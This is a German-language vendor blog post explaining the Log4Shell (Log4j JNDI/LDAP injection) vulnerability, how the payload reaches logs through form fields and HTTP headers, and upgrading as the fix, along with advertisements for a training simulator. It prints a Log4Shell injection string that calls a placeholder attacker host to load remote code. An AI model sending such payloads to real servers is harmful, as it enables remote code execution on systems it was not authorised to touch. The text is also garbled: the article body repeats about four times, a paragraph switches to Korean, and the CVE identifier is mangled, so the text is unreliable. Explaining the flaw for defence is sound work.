Beschreibung der Log4j-Sicherheitslücke – Angriffsvektoren und Präventionsmaßnahmen
Am 9. Dezember wurde ein Zero-Day-Exploit für die Java-Bibliothek Log4j veröffentlicht. CVE-44228, auch bekannt als Log4j Shell, wurde aufgrund der Möglichkeit der Ausführung von Remote-Code als „hochkritisch“ eingestuft (Race). Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.
Möchten Sie Ihre Kenntnisse im Umgang mit Log4Shell schnell verbessern?
Ausgehend von den Grundkonzepten von Log4Shell haben wir ein Showcase erstellt, in dem Sie die Ausnutzung dieser Schwachstelle in einem Simulator namens Mission erleben können. In dieser Mission zeigen wir Ihnen, welche Auswirkungen die Log4j-Schwachstelle auf Ihre Infrastruktur und Anwendungen haben kann. Klicken Sie hier, um direkt zum Showcase zu gelangen, oderlesen Sie weiter, um mehr über diese Schwachstelle zu erfahren.
Alte Nachrichten?
Exploits sind nichts Neues. Sicherheitsforscher haben bereits 2016 in einer Black Hat-Präsentation von Alvaro Munoz und Oleksandr Mirosh betont: „Anwendungen sollten keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen.“Sie erklärten, wie eine gezielte JNDI/LDAP-Injektion zu einer Remote-Code-Ausführung führen kann. Genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Injektions-Payload von Log4Shell lautet wie folgt.
$ {indi:ldap: //attacker.host/xyz}
이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.
Als Nächstes gibt es JNDI oder eine API, die es ermöglicht, Daten oder Ressourcen zu suchen, indem sie sich über Protokolle wie Java Naming and Directory Interface, LDAP, DNS, RMI usw. mit Diensten verbindet. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine schädliche Nutzlast eine Suche auf einem LDAP-Server durch, der vom Angreifer kontrolliert wird. Die Antwort kann beispielsweise auf eine Java-Klassendatei verweisen, die schädlichen Code enthält, die dann auf einem anfälligen Server ausgeführt wird.
Der Grund, warum diese Schwachstelle so problematisch ist, liegt darin, dass Log4j alle Protokolleinträge auswertet und alle aufgezeichneten Benutzereingaben mit dem Präfix „jndi“ in EL-Syntax abfragt. Die Nutzlast kann an allen Stellen eingefügt werden, an denen Benutzer Daten eingeben können, beispielsweise in Formularfeldern.Außerdem können HTTP-Header (z. B. User-Agent und X-Forwarded-For sowie andere Header) so angepasst werden, dass sie die Nutzlast übertragen.
Um Exploits selbst zu erleben , gehen Sie zum Showcase und fahren Sie mit Schritt 2 – „Erleben Sie die Wirkung“ fort.
Prävention: Bewusstsein
Da Log4j den anfälligen Code patcht, wird ein Upgrade für alle Anwendungen empfohlen. Allerdings enthalten die Versionen 2.15.0 und 2.16.0 DDoS- und andere Schwachstellen, sodass ein Upgrade auf 2.17.0 ab Ende Dezember empfohlen wird.
Als Entwickler, die Code schreiben, müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Verwendung externer Quellen, die wir naiv für sicher halten, die Sicherheit unserer Anwendungen gefährden kann.
Hätte diese Schwachstelle verhindert werden können? Ja und nein. Einerseits können Entwickler nur dann viel tun, wenn die anfällige Komponente über Software von Drittanbietern eingeführt wird. Andererseits ist die daraus gewonnene Erkenntnis nichts Neues: Man sollte niemals den Eingaben der Benutzer vertrauen.
Secure Code Warrior ist davon überzeugt, dass dies der beste Weg für sicherheitsbewusste Entwickler ist, um Schwachstellen im Code zu vermeiden. Da SCW Schulungen für verschiedene Programmierframeworks in großem Umfang anbietet, konnten Unternehmenskunden anhand der Berichtsdaten schnell ermitteln, welche Java-Entwickler betroffen waren. Außerdem wurde die Log4j-Aktualisierung mit Hilfe von SCW-geschulten Sicherheitsexperten beschleunigt.
Insbesondere für Java-Entwickler bietet Secure Code Warrior das kostenlose IntelliJ-Plugin Sensei an. Dieses regelbasierte Code-Analyse-Tool kann zur Anwendung von Codierungsrichtlinien und zur Vorbeugung und Behebung von Schwachstellen verwendet werden. Sie können eigene Regeln erstellen oder vorgefertigte Regeln verwenden. Kochbuch. Schauen Sie sich unsere Rezepte an und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, das Ihnen dabei hilft, die Log4Shell-Schwachstelle im Handumdrehen zu finden und zu beheben.
Verbessern Sie Ihre Verteidigungstechniken gegen Log4Shell.
Möchten Sie das in diesem Blogbeitrag Gelernte in der Praxis anwenden? Dann könnte Ihnen die Showcase-Umgebung helfen. Wenn Sie die Showcase-Umgebung starten, werden Sie zunächst schnell durch die Schwachstelle geführt und gelangen dann in eine Simulationsumgebung, in der Sie anhand der Anweisungen versuchen können, die Schwachstelle auszunutzen.
Im Dezember 2021 wurde eine schwerwiegende Sicherheitslücke namens Log4Shell in der Java-Bibliothek Log4j bekannt gegeben. In diesem Dokument wird die Log4Shell-Sicherheitslücke in ihrer einfachsten Form aufgeschlüsselt, um die Grundlagen zu vermitteln. Auf der Grundlage dieses Wissens wird eine Spielwiese vorgestellt, auf der simulierte Websites ausgenutzt werden können.
Secure Code Warrior ist für Unternehmen da, um den Code während des gesamten Softwareentwicklungszyklus zu schützen und eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Unabhängig davon, ob Sie AppSec-Manager, Entwickler, CISO oder in einem anderen Bereich der Sicherheit tätig sind, können wir Ihnen dabei helfen, die Risiken zu reduzieren, die mit unsicherem Code verbunden sind.
Demo-Termin vereinbaren
Laura Verheyde ist Softwareentwicklerin bei Secure Code Warrior und beschäftigt sich mit der Erforschung von Schwachstellen und der Erstellung von Inhalten für Missions und Coding Labs.
Am 9. Dezember wurde ein Zero-Day-Exploit für die Java-Bibliothek Log4j veröffentlicht. CVE-44228, auch bekannt als Log4j Shell, wurde aufgrund der Möglichkeit der Ausführung von Remote-Code als „hochkritisch“ eingestuft (Race). Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.
Möchten Sie Ihre Kenntnisse im Umgang mit Log4Shell schnell verbessern?
Ausgehend von den Grundkonzepten von Log4Shell haben wir ein Showcase erstellt, in dem Sie die Ausnutzung dieser Schwachstelle in einem Simulator namens Mission erleben können. In dieser Mission zeigen wir Ihnen, welche Auswirkungen die Log4j-Schwachstelle auf Ihre Infrastruktur und Anwendungen haben kann. Klicken Sie hier, um direkt zum Showcase zu gelangen, oderlesen Sie weiter, um mehr über diese Schwachstelle zu erfahren.
Alte Nachrichten?
Exploits sind nichts Neues. Sicherheitsforscher haben bereits 2016 in einer Black Hat-Präsentation von Alvaro Munoz und Oleksandr Mirosh betont: „Anwendungen sollten keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen.“Sie erklärten, wie eine gezielte JNDI/LDAP-Injektion zu einer Remote-Code-Ausführung führen kann. Genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Injektions-Payload von Log4Shell lautet wie folgt.
$ {indi:ldap: //attacker.host/xyz}
이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.
Als Nächstes gibt es JNDI oder eine API, die es ermöglicht, Daten oder Ressourcen zu suchen, indem sie sich über Protokolle wie Java Naming and Directory Interface, LDAP, DNS, RMI usw. mit Diensten verbindet. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine schädliche Nutzlast eine Suche auf einem LDAP-Server durch, der vom Angreifer kontrolliert wird. Die Antwort kann beispielsweise auf eine Java-Klassendatei verweisen, die schädlichen Code enthält, die dann auf einem anfälligen Server ausgeführt wird.
Der Grund, warum diese Schwachstelle so problematisch ist, liegt darin, dass Log4j alle Protokolleinträge auswertet und alle aufgezeichneten Benutzereingaben mit dem Präfix „jndi“ in EL-Syntax abfragt. Die Nutzlast kann an allen Stellen eingefügt werden, an denen Benutzer Daten eingeben können, beispielsweise in Formularfeldern.Außerdem können HTTP-Header (z. B. User-Agent und X-Forwarded-For sowie andere Header) so angepasst werden, dass sie die Nutzlast übertragen.
Um Exploits selbst zu erleben , gehen Sie zum Showcase und fahren Sie mit Schritt 2 – „Erleben Sie die Wirkung“ fort.
Prävention: Bewusstsein
Da Log4j den anfälligen Code patcht, wird ein Upgrade für alle Anwendungen empfohlen. Allerdings enthalten die Versionen 2.15.0 und 2.16.0 DDoS- und andere Schwachstellen, sodass ein Upgrade auf 2.17.0 ab Ende Dezember empfohlen wird.
Als Entwickler, die Code schreiben, müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Verwendung externer Quellen, die wir naiv für sicher halten, die Sicherheit unserer Anwendungen gefährden kann.
Hätte diese Schwachstelle verhindert werden können? Ja und nein. Einerseits können Entwickler nur dann viel tun, wenn die anfällige Komponente über Software von Drittanbietern eingeführt wird. Andererseits ist die daraus gewonnene Erkenntnis nichts Neues: Man sollte niemals den Eingaben der Benutzer vertrauen.
Secure Code Warrior ist davon überzeugt, dass dies der beste Weg für sicherheitsbewusste Entwickler ist, um Schwachstellen im Code zu vermeiden. Da SCW Schulungen für verschiedene Programmierframeworks in großem Umfang anbietet, konnten Unternehmenskunden anhand der Berichtsdaten schnell ermitteln, welche Java-Entwickler betroffen waren. Außerdem wurde die Log4j-Aktualisierung mit Hilfe von SCW-geschulten Sicherheitsexperten beschleunigt.
Insbesondere für Java-Entwickler bietet Secure Code Warrior das kostenlose IntelliJ-Plugin Sensei an. Dieses regelbasierte Code-Analyse-Tool kann zur Anwendung von Codierungsrichtlinien und zur Vorbeugung und Behebung von Schwachstellen verwendet werden. Sie können eigene Regeln erstellen oder vorgefertigte Regeln verwenden. Kochbuch. Schauen Sie sich unsere Rezepte an und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, das Ihnen dabei hilft, die Log4Shell-Schwachstelle im Handumdrehen zu finden und zu beheben.
Verbessern Sie Ihre Verteidigungstechniken gegen Log4Shell.
Möchten Sie das in diesem Blogbeitrag Gelernte in der Praxis anwenden? Dann könnte Ihnen die Showcase-Umgebung helfen. Wenn Sie die Showcase-Umgebung starten, werden Sie zunächst schnell durch die Schwachstelle geführt und gelangen dann in eine Simulationsumgebung, in der Sie anhand der Anweisungen versuchen können, die Schwachstelle auszunutzen.
Am 9. Dezember wurde ein Zero-Day-Exploit für die Java-Bibliothek Log4j veröffentlicht. CVE-44228, auch bekannt als Log4j Shell, wurde aufgrund der Möglichkeit der Ausführung von Remote-Code als „hochkritisch“ eingestuft (Race). Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.
Möchten Sie Ihre Kenntnisse im Umgang mit Log4Shell schnell verbessern?
Ausgehend von den Grundkonzepten von Log4Shell haben wir ein Showcase erstellt, in dem Sie die Ausnutzung dieser Schwachstelle in einem Simulator namens Mission erleben können. In dieser Mission zeigen wir Ihnen, welche Auswirkungen die Log4j-Schwachstelle auf Ihre Infrastruktur und Anwendungen haben kann. Klicken Sie hier, um direkt zum Showcase zu gelangen, oderlesen Sie weiter, um mehr über diese Schwachstelle zu erfahren.
Alte Nachrichten?
Exploits sind nichts Neues. Sicherheitsforscher haben bereits 2016 in einer Black Hat-Präsentation von Alvaro Munoz und Oleksandr Mirosh betont: „Anwendungen sollten keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen.“Sie erklärten, wie eine gezielte JNDI/LDAP-Injektion zu einer Remote-Code-Ausführung führen kann. Genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Injektions-Payload von Log4Shell lautet wie folgt.
$ {indi:ldap: //attacker.host/xyz}
이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.
Als Nächstes gibt es JNDI oder eine API, die es ermöglicht, Daten oder Ressourcen zu suchen, indem sie sich über Protokolle wie Java Naming and Directory Interface, LDAP, DNS, RMI usw. mit Diensten verbindet. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine schädliche Nutzlast eine Suche auf einem LDAP-Server durch, der vom Angreifer kontrolliert wird. Die Antwort kann beispielsweise auf eine Java-Klassendatei verweisen, die schädlichen Code enthält, die dann auf einem anfälligen Server ausgeführt wird.
Der Grund, warum diese Schwachstelle so problematisch ist, liegt darin, dass Log4j alle Protokolleinträge auswertet und alle aufgezeichneten Benutzereingaben mit dem Präfix „jndi“ in EL-Syntax abfragt. Die Nutzlast kann an allen Stellen eingefügt werden, an denen Benutzer Daten eingeben können, beispielsweise in Formularfeldern.Außerdem können HTTP-Header (z. B. User-Agent und X-Forwarded-For sowie andere Header) so angepasst werden, dass sie die Nutzlast übertragen.
Um Exploits selbst zu erleben , gehen Sie zum Showcase und fahren Sie mit Schritt 2 – „Erleben Sie die Wirkung“ fort.
Prävention: Bewusstsein
Da Log4j den anfälligen Code patcht, wird ein Upgrade für alle Anwendungen empfohlen. Allerdings enthalten die Versionen 2.15.0 und 2.16.0 DDoS- und andere Schwachstellen, sodass ein Upgrade auf 2.17.0 ab Ende Dezember empfohlen wird.
Als Entwickler, die Code schreiben, müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Verwendung externer Quellen, die wir naiv für sicher halten, die Sicherheit unserer Anwendungen gefährden kann.
Hätte diese Schwachstelle verhindert werden können? Ja und nein. Einerseits können Entwickler nur dann viel tun, wenn die anfällige Komponente über Software von Drittanbietern eingeführt wird. Andererseits ist die daraus gewonnene Erkenntnis nichts Neues: Man sollte niemals den Eingaben der Benutzer vertrauen.
Secure Code Warrior ist davon überzeugt, dass dies der beste Weg für sicherheitsbewusste Entwickler ist, um Schwachstellen im Code zu vermeiden. Da SCW Schulungen für verschiedene Programmierframeworks in großem Umfang anbietet, konnten Unternehmenskunden anhand der Berichtsdaten schnell ermitteln, welche Java-Entwickler betroffen waren. Außerdem wurde die Log4j-Aktualisierung mit Hilfe von SCW-geschulten Sicherheitsexperten beschleunigt.
Insbesondere für Java-Entwickler bietet Secure Code Warrior das kostenlose IntelliJ-Plugin Sensei an. Dieses regelbasierte Code-Analyse-Tool kann zur Anwendung von Codierungsrichtlinien und zur Vorbeugung und Behebung von Schwachstellen verwendet werden. Sie können eigene Regeln erstellen oder vorgefertigte Regeln verwenden. Kochbuch. Schauen Sie sich unsere Rezepte an und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, das Ihnen dabei hilft, die Log4Shell-Schwachstelle im Handumdrehen zu finden und zu beheben.
Verbessern Sie Ihre Verteidigungstechniken gegen Log4Shell.
Möchten Sie das in diesem Blogbeitrag Gelernte in der Praxis anwenden? Dann könnte Ihnen die Showcase-Umgebung helfen. Wenn Sie die Showcase-Umgebung starten, werden Sie zunächst schnell durch die Schwachstelle geführt und gelangen dann in eine Simulationsumgebung, in der Sie anhand der Anweisungen versuchen können, die Schwachstelle auszunutzen.
Klicken Sie auf den folgenden Link und laden Sie die PDF-Datei dieser Ressource herunter.
Secure Code Warrior ist für Unternehmen da, um den Code während des gesamten Softwareentwicklungszyklus zu schützen und eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Unabhängig davon, ob Sie AppSec-Manager, Entwickler, CISO oder in einem anderen Bereich der Sicherheit tätig sind, können wir Ihnen dabei helfen, die Risiken zu reduzieren, die mit unsicherem Code verbunden sind.
Bericht anzeigenDemo-Termin vereinbaren
Laura Verheyde ist Softwareentwicklerin bei Secure Code Warrior und beschäftigt sich mit der Erforschung von Schwachstellen und der Erstellung von Inhalten für Missions und Coding Labs.
Am 9. Dezember wurde ein Zero-Day-Exploit für die Java-Bibliothek Log4j veröffentlicht. CVE-44228, auch bekannt als Log4j Shell, wurde aufgrund der Möglichkeit der Ausführung von Remote-Code als „hochkritisch“ eingestuft (Race). Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.
Möchten Sie Ihre Kenntnisse im Umgang mit Log4Shell schnell verbessern?
Ausgehend von den Grundkonzepten von Log4Shell haben wir ein Showcase erstellt, in dem Sie die Ausnutzung dieser Schwachstelle in einem Simulator namens Mission erleben können. In dieser Mission zeigen wir Ihnen, welche Auswirkungen die Log4j-Schwachstelle auf Ihre Infrastruktur und Anwendungen haben kann. Klicken Sie hier, um direkt zum Showcase zu gelangen, oderlesen Sie weiter, um mehr über diese Schwachstelle zu erfahren.
Alte Nachrichten?
Exploits sind nichts Neues. Sicherheitsforscher haben bereits 2016 in einer Black Hat-Präsentation von Alvaro Munoz und Oleksandr Mirosh betont: „Anwendungen sollten keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen.“Sie erklärten, wie eine gezielte JNDI/LDAP-Injektion zu einer Remote-Code-Ausführung führen kann. Genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Injektions-Payload von Log4Shell lautet wie folgt.
$ {indi:ldap: //attacker.host/xyz}
이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.
Als Nächstes gibt es JNDI oder eine API, die es ermöglicht, Daten oder Ressourcen zu suchen, indem sie sich über Protokolle wie Java Naming and Directory Interface, LDAP, DNS, RMI usw. mit Diensten verbindet. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine schädliche Nutzlast eine Suche auf einem LDAP-Server durch, der vom Angreifer kontrolliert wird. Die Antwort kann beispielsweise auf eine Java-Klassendatei verweisen, die schädlichen Code enthält, die dann auf einem anfälligen Server ausgeführt wird.
Der Grund, warum diese Schwachstelle so problematisch ist, liegt darin, dass Log4j alle Protokolleinträge auswertet und alle aufgezeichneten Benutzereingaben mit dem Präfix „jndi“ in EL-Syntax abfragt. Die Nutzlast kann an allen Stellen eingefügt werden, an denen Benutzer Daten eingeben können, beispielsweise in Formularfeldern.Außerdem können HTTP-Header (z. B. User-Agent und X-Forwarded-For sowie andere Header) so angepasst werden, dass sie die Nutzlast übertragen.
Um Exploits selbst zu erleben , gehen Sie zum Showcase und fahren Sie mit Schritt 2 – „Erleben Sie die Wirkung“ fort.
Prävention: Bewusstsein
Da Log4j den anfälligen Code patcht, wird ein Upgrade für alle Anwendungen empfohlen. Allerdings enthalten die Versionen 2.15.0 und 2.16.0 DDoS- und andere Schwachstellen, sodass ein Upgrade auf 2.17.0 ab Ende Dezember empfohlen wird.
Als Entwickler, die Code schreiben, müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Verwendung externer Quellen, die wir naiv für sicher halten, die Sicherheit unserer Anwendungen gefährden kann.
Hätte diese Schwachstelle verhindert werden können? Ja und nein. Einerseits können Entwickler nur dann viel tun, wenn die anfällige Komponente über Software von Drittanbietern eingeführt wird. Andererseits ist die daraus gewonnene Erkenntnis nichts Neues: Man sollte niemals den Eingaben der Benutzer vertrauen.
Secure Code Warrior ist davon überzeugt, dass dies der beste Weg für sicherheitsbewusste Entwickler ist, um Schwachstellen im Code zu vermeiden. Da SCW Schulungen für verschiedene Programmierframeworks in großem Umfang anbietet, konnten Unternehmenskunden anhand der Berichtsdaten schnell ermitteln, welche Java-Entwickler betroffen waren. Außerdem wurde die Log4j-Aktualisierung mit Hilfe von SCW-geschulten Sicherheitsexperten beschleunigt.
Insbesondere für Java-Entwickler bietet Secure Code Warrior das kostenlose IntelliJ-Plugin Sensei an. Dieses regelbasierte Code-Analyse-Tool kann zur Anwendung von Codierungsrichtlinien und zur Vorbeugung und Behebung von Schwachstellen verwendet werden. Sie können eigene Regeln erstellen oder vorgefertigte Regeln verwenden. Kochbuch. Schauen Sie sich unsere Rezepte an und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, das Ihnen dabei hilft, die Log4Shell-Schwachstelle im Handumdrehen zu finden und zu beheben.
Verbessern Sie Ihre Verteidigungstechniken gegen Log4Shell.
Möchten Sie das in diesem Blogbeitrag Gelernte in der Praxis anwenden? Dann könnte Ihnen die Showcase-Umgebung helfen. Wenn Sie die Showcase-Umgebung starten, werden Sie zunächst schnell durch die Schwachstelle geführt und gelangen dann in eine Simulationsumgebung, in der Sie anhand der Anweisungen versuchen können, die Schwachstelle auszunutzen.
Inhaltsverzeichnis
Secure Code Warrior ist für Unternehmen da, um den Code während des gesamten Softwareentwicklungszyklus zu schützen und eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Unabhängig davon, ob Sie AppSec-Manager, Entwickler, CISO oder in einem anderen Bereich der Sicherheit tätig sind, können wir Ihnen dabei helfen, die Risiken zu reduzieren, die mit unsicherem Code verbunden sind.
Demo-Termin vereinbarenDownloadHilfreiche Ressourcen für den Einstieg
Themen und Inhalte der Sicherheitsschulung
Die branchenweit besten Inhalte werden unter Berücksichtigung der Kundenrollen ständig weiterentwickelt und an die sich ständig verändernde Softwareentwicklungsumgebung angepasst. Es werden Themen angeboten, die alle Bereiche von KI bis hin zu XQuery-Injection abdecken und für verschiedene Rollen geeignet sind, von Architekten und Ingenieuren bis hin zu Produktmanagern und QA-Mitarbeitern. Sehen Sie sich vorab an, was der Inhaltskatalog nach Themen und Rollen zu bieten hat.
Die Kamer van Koophandel setzt Maßstäbe für entwicklergesteuerte Sicherheit in großem Maßstab
Die Kamer van Koophandel berichtet, wie sie sicheres Codieren durch rollenbasierte Zertifizierungen, Trust Score-Benchmarking und eine Kultur der gemeinsamen Verantwortung für Sicherheit in die tägliche Entwicklungsarbeit integriert hat.
%20(1).avif)
.avif)
Bedrohungsmodellierung mit KI: So wird jeder Entwickler zum Bedrohungsmodellierer
Sie werden besser gerüstet sein, um Entwicklern dabei zu helfen, Ideen und Techniken zur Bedrohungsmodellierung mit den KI-Tools zu kombinieren, die sie bereits verwenden, um die Sicherheit zu erhöhen, die Zusammenarbeit zu verbessern und von Anfang an widerstandsfähigere Software zu entwickeln.
Hilfreiche Ressourcen für den Einstieg
Cybermon ist zurück: Die KI-Mission zum Besiegen des Bosses ist jetzt auf Abruf verfügbar.
Cybermon 2025 Bit The Boss ist jetzt das ganze Jahr über bei SCW verfügbar. Stärken Sie die Entwicklung von Sicherheits-KI in großem Maßstab durch den Einsatz fortschrittlicher KI/LLM-Sicherheitslösungen.
Erläuterung des Gesetzes zur Cyber-Resilienz: Bedeutung der Entwicklung von Sicherheitsdesign-Software
Erfahren Sie mehr über die Anforderungen und Anwendungsbereiche des EU-Cyberresilienzgesetzes (CRA) und darüber, wie sich Ingenieurteams durch Design, Praktiken, Schwachstellenvermeidung und die Einrichtung einer Entwicklerumgebung sicher vorbereiten können.
Erfolgsfaktor 1: Definierte und messbare Erfolgskriterien
Enabler 1 bietet eine zehnteilige Reihe von Erfolgsfaktoren, die zeigen, wie sichere Codierung zu Geschäftsergebnissen wie einer schnelleren Risikominderung und Kostensenkung für die Reifung langfristiger Programme beitragen kann.
